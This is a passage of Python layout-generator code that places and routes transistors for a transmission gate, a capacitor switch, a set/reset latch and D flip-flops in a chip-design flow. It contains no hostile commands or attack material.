gridname=rg_m1m2) ##Add by zhongkai def generate_tgate_dn(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, m=1, n=1, m_in=3, m_out=3, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # passgate size, using nf=2 devices n = max(1, int(n / 2)) # pulldown size, using nf=2 devices if m_in > m/2: m_in = int(m/2) #input paths if m_out > m/2: m_out = int(m/2) #output_paths # placement in_space = laygen.place("I"+objectname_pfix+'NDMY', devname_nmos_space, pg, shape=np.array([2, 1]), xy=origin) in0 = laygen.relplace(name = "I" + objectname_pfix + 'N0', templatename = devname_nmos_boundary, gridname = pg, refinstname = in_space.name) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name, shape=np.array([2, 1])) in3 = laygen.relplace(name = "I"+objectname_pfix+'N3', templatename = devname_nmos_body, gridname = pg, refinstname = in2.name, shape=np.array([n, 1])) in4 = laygen.relplace(name = "I"+objectname_pfix+'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name) ip_space = laygen.relplace(name = "I"+objectname_pfix+'PDMY', templatename = devname_pmos_space, gridname = pg, refinstname = in_space.name, direction='top', transform='MX', shape=np.array([2, 1])) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip_space.name, transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = 'pmos4_fast_space', gridname = pg, refinstname = ip2.name, shape=np.array([n+4,1]), transform='MX') # route #to vss for i in range(n): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='S0', refinstindex0=np.array([i, 0]), refinstname1=in3.name, refpinname1='S0', refinstindex1=np.array([i, 0])) laygen.via(None, np.array([0, 0]), refinstname=in3.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='S0', refinstindex0=np.array([n, 0]), refinstname1=in3.name, refpinname1='S0', refinstindex1=np.array([n, 0])) laygen.via(None, np.array([0, 0]), refinstname=in3.name, gridname=rg_m1m2, refinstindex=np.array([n, 0])) # en, enb for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-3, 0]), xy1=np.array([-3, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-3, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-2, 0]), xy1=np.array([-2, 2]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([-2, 0]), refinstname=ip1.name, refpinname='G0', gridname=rg_m2m3) # gate for pull down in3_g0_xy = laygen.get_inst_pin_xy(in3.name, 'G0', rg_m2m3) ip1_g0_xy = laygen.get_inst_pin_xy(ip1.name, 'G0', rg_m2m3) laygen.route_vh(laygen.layers['metal'][1], laygen.layers['metal'][2], in3_g0_xy[0], ip1_g0_xy[0], rg_m1m2) for i in range(n): laygen.via(None, np.array([0, 0]), refinstname=in3.name, refpinname='G0', gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in3.name, refpinname1='G0', refinstindex1=np.array([n-1, 0])) #input #input wire for i in range(m_in): rix = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([i, 0])) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) if create_pin == True: laygen.pin(gridname=rg_m2m3, name='I_'+str(i), layer=laygen.layers['pin'][3], refobj=rix, netname='I') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #connecting source for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) #output #output wire for i in range(m_out): rox = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([m-1-i, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1-i, 0])) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([m-1-i, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([m-1-i, 0]), gridname=rg_m2m3) if create_pin == True: laygen.pin(gridname=rg_m2m3, name='O_'+str(i), layer=laygen.layers['pin'][3], refobj=rox, netname='O') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #connection for in3 laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([m-1, 0]), refinstname1=in3.name, refpinname1='D0', refinstindex1=np.array([n-1, 0])) #connecting drain for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) #connection for in3 for i in range(n): laygen.via(None, np.array([0, 1]), refinstname=in3.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = ip3.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip_space.name, refinstname1=ip3.name, refinstindex1=np.array([n+3, 0])) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in_space.name, refinstname1=in4.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'ENB'], rect_list=[ren0, renb0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_cap_sw(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, m=1, origin=np.array([0,0]), create_pin=False): #generate an nmos type switch pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I" + objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = 'pmos4_fast_space', gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = 'pmos4_fast_space', gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = 'pmos4_fast_space', gridname = pg, refinstname = ip1.name, transform='MX') # route # to ground for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='S0', refinstindex1=np.array([i, 0])) laygen.via(None, np.array([0, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([m-1, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.via(None, np.array([0, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([m, 0])) # en, enb for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) #output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), endstyle0='extend', refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), endstyle1='extend') for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) ro=[] for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, -1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0])) ro.append(ro0) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: ren0_pin_xy = laygen.get_xy(obj = ren0, gridname = rg_m3m4) laygen.pin(name='EN', layer=laygen.layers['pin'][3], xy=ren0_pin_xy, gridname=rg_m3m4, netname='EN') ro0_pin_xy = laygen.get_xy(obj = ro[0], gridname = rg_m3m4) laygen.pin(name='VO', layer=laygen.layers['pin'][3], xy=ro0_pin_xy, gridname=rg_m3m4, netname='VO') create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_latch_2ck_strstbh(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4,origin=np.array([0, 0]), m=4, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, route_rstm_y=5, pin_o_y=6, create_pin=False): """generate D latch (complementary clock)""" pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I"+objectname_pfix + 'TINV0', "tinv_"+str(m)+"x", pg, xy=origin) i2 = laygen.relplace(name = "I"+objectname_pfix + 'TGAT0', templatename = "tgate_2x", gridname = pg, refinstname = i0.name) #used minimum size i3 = laygen.relplace(name = "I"+objectname_pfix + 'ND1', templatename = "nand_2x", gridname = pg, refinstname = i2.name) #used minimum size i1 = laygen.relplace(name = "I"+objectname_pfix + 'ND0', templatename = "nand_"+str(m)+"x", gridname = pg, refinstname = i3.name) # internal pins tinv0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4) tinv0_en_xy = laygen.get_inst_pin_xy(i0.name, 'EN', rg_m3m4) tinv0_enb_xy = laygen.get_inst_pin_xy(i0.name, 'ENB', rg_m3m4) tinv0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4) nd0_a_xy = laygen.get_inst_pin_xy(i1.name, 'A', rg_m3m4) nd0_b_xy = laygen.get_inst_pin_xy(i1.name, 'B', rg_m3m4) nd0_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4) tgate0_i_xy = laygen.get_inst_pin_xy(i2.name, 'I', rg_m3m4) tgate0_en_xy = laygen.get_inst_pin_xy(i2.name, 'EN', rg_m3m4) tgate0_enb_xy = laygen.get_inst_pin_xy(i2.name, 'ENB', rg_m3m4) tgate0_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4) nd1_a_xy = laygen.get_inst_pin_xy(i3.name, 'A', rg_m3m4) nd1_b_xy = laygen.get_inst_pin_xy(i3.name, 'B', rg_m3m4) nd1_o_xy = laygen.get_inst_pin_xy(i3.name, 'O', rg_m3m4) #clk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], tinv0_en_xy[0], tgate0_enb_xy[0], pin_clk_y, rg_m3m4) rclk0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]), xy1=np.array([tgate0_enb_xy[0][0], pin_clk_y]), gridname0=rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], tinv0_enb_xy[0], tgate0_en_xy[0], pin_clkb_y, rg_m3m4) rclkb0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]), xy1=np.array([tgate0_en_xy[0][0], pin_clkb_y]), gridname0=rg_m3m4) #storage node laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], np.array([tinv0_o_xy[0][0],route_mem_y]), np.array([tgate0_o_xy[0][0],route_mem_y]), route_mem_y, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], np.array([tgate0_o_xy[0][0],route_mem_y]), np.array([nd0_a_xy[0][0],route_mem_y]), route_mem_y, rg_m3m4) #resetm node laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], np.array([nd1_o_xy[0][0],route_rstm_y]), np.array([tgate0_i_xy[0][0],route_rstm_y]), route_rstm_y, rg_m3m4) #nd0 output to nd1 input laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], np.array([nd0_o_xy[0][0],pin_o_y]), np.array([nd1_a_xy[0][0],pin_o_y]), pin_o_y, rg_m3m4) ro0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([nd0_o_xy[0][0], pin_o_y]), xy1=np.array([nd1_a_xy[0][0], pin_o_y]), gridname0=rg_m3m4) #pin if create_pin == True: ri0_pin_xy=laygen.get_inst_pin_xy(name="I" + objectname_pfix + 'TINV0', pinname='I', gridname=rg_m3m4) laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ri0_pin_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclk0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='CLKB', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclkb0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='STB', layer=laygen.layers['pin'][3], xy=nd0_b_xy, gridname=rg_m3m4) laygen.pin(name='RSTB', layer=laygen.layers['pin'][3], xy=nd1_b_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = ro0, gridname = rg_m3m4), gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VDD', rg_m2m3) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VDD', rg_m2m3) rvss0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VSS', rg_m2m3) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VSS', rg_m2m3) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_dff_strsth(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=4, create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i8 = laygen.place("I" + objectname_pfix + 'INV8', "inv_" + str(m) + "x", pg, xy=origin) i9 = laygen.relplace(name = "I" + objectname_pfix + 'INV9', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i8.name) i10= laygen.relplace(name = "I" + objectname_pfix + 'INV10', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i9.name) #stb i11= laygen.relplace(name = "I" + objectname_pfix + 'INV11', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i10.name) #rstb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'INV11'), gridname = pg)+ laygen.get_xy(obj = i10.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_strstbh(laygen, objectname_pfix+'LCH0', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, route_rstm_y = 8, pin_o_y=5, create_pin=False) ##These two lines use different position for clk and clkb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'LCH0ND0'), gridname = pg)+ \ laygen.get_xy(obj = laygen.get_inst('I' + objectname_pfix + 'LCH0ND0').template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_strstbh(laygen, objectname_pfix+'LCH1', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=2, pin_clkb_y=3, route_mem_y=4, route_rstm_y = 8, pin_o_y=5, create_pin=False) #inverter coordinates i8_i_xy = laygen.get_inst_pin_xy(i8.name, 'I', rg_m3m4) i8_o_xy = laygen.get_inst_pin_xy(i8.name, 'O', rg_m3m4) i9_i_xy = laygen.get_inst_pin_xy(i9.name, 'I', rg_m3m4) i9_o_xy = laygen.get_inst_pin_xy(i9.name, 'O', rg_m3m4) i10_i_xy = laygen.get_inst_pin_xy(i10.name, 'I', rg_m3m4) i10_o_xy = laygen.get_inst_pin_xy(i10.name, 'O', rg_m3m4) i11_i_xy = laygen.get_inst_pin_xy(i11.name, 'I', rg_m3m4) i11_o_xy = laygen.get_inst_pin_xy(i11.name, 'O', rg_m3m4) #Latch coordinate ilch0_i_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'I', rg_m3m4) ilch0_ck_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'EN', rg_m3m4) ilch0_ckb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'ENB', rg_m3m4) ilch0_stb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'B', rg_m3m4) #set pin of latch 0 ilch0_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND1', 'B', rg_m3m4) #reset pin of latch 0 ilch0_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'O', rg_m3m4) ilch1_i_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'I', rg_m3m4) ilch1_ck_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'EN', rg_m3m4) ilch1_ckb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'ENB', rg_m3m4) ilch1_stb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'B', rg_m3m4) #set pin of latch 0 ilch1_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND1', 'B', rg_m3m4) #reset pin of latch 1 ilch1_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'O', rg_m3m4) # iclkb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i8_o_xy[0], i9_i_xy[0], 3, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i9_i_xy[0], ilch1_ckb_xy[0], 3, rg_m3m4) # iclk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i9_o_xy[0], ilch1_ck_xy[0], 2, rg_m3m4) # intermediate laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ilch0_o_xy[0], ilch1_i_xy[0], 5, rg_m3m4) # stb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i10_o_xy[0], ilch0_stb_xy[0], 6, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i10_o_xy[0], ilch1_stb_xy[0], 6, rg_m3m4) # rstb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i11_o_xy[0], ilch0_rstb_xy[0], 7, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i11_o_xy[0], ilch1_rstb_xy[0], 7, rg_m3m4) #pin if create_pin == True: laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ilch0_i_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][3], xy=i8_i_xy, gridname=rg_m3m4) laygen.pin(name='ST', layer=laygen.layers['pin'][3], xy=i10_i_xy, gridname=rg_m3m4) laygen.pin(name='RST', layer=laygen.layers['pin'][3], xy=i11_i_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=ilch1_o_xy, gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy(i8.name, 'VDD', rg_m1m2) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VDD', rg_m1m2) #(fix this) rvss0_pin_xy = laygen.get_inst_pin_xy(i8.name, 'VSS', rg_m1m2) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VSS', rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_dff_strsth_ckb(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=4, create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i12 = laygen.place("I" + objectname_pfix + 'INV12', "inv_" + str(m) + "x", pg, xy=origin) i8 = laygen.relplace(name = "I" + objectname_pfix + 'INV8', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i12.name) #clk buffers -- try to make sure the number is same with schematic i9 = laygen.relplace(name = "I" + objectname_pfix + 'INV9', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i8.name) #that is why it's not start from '0' i10= laygen.relplace(name = "I" + objectname_pfix + 'INV10', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i9.name) #stb i11= laygen.relplace(name = "I" + objectname_pfix + 'INV11', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i10.name) #rstb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'INV11'), gridname = pg)+ laygen.get_xy(obj = i10.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_strstbh(laygen, objectname_pfix+'LCH0', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, #Can we return the object of it as before? -- Zhongkai origin=org, m=m, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, route_rstm_y = 8, pin_o_y=5, create_pin=False) ##These two lines use different position for clk and clkb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'LCH0ND0'), gridname = pg)+ \ laygen.get_xy(obj = laygen.get_inst('I' + objectname_pfix + 'LCH0ND0').template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_strstbh(laygen, objectname_pfix+'LCH1', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=2, pin_clkb_y=3, route_mem_y=4, route_rstm_y = 8, pin_o_y=5, create_pin=False) #inverter coordinates i12_i_xy = laygen.get_inst_pin_xy(i12.name, 'I', rg_m3m4) i12_o_xy = laygen.get_inst_pin_xy(i12.name, 'O', rg_m3m4) i8_i_xy = laygen.get_inst_pin_xy(i8.name, 'I', rg_m3m4) i8_o_xy = laygen.get_inst_pin_xy(i8.name, 'O', rg_m3m4) i9_i_xy = laygen.get_inst_pin_xy(i9.name, 'I', rg_m3m4) i9_o_xy = laygen.get_inst_pin_xy(i9.name, 'O', rg_m3m4) i10_i_xy = laygen.get_inst_pin_xy(i10.name, 'I', rg_m3m4) i10_o_xy = laygen.get_inst_pin_xy(i10.name, 'O', rg_m3m4) i11_i_xy = laygen.get_inst_pin_xy(i11.name, 'I', rg_m3m4) i11_o_xy = laygen.get_inst_pin_xy(i11.name, 'O', rg_m3m4) #Latch 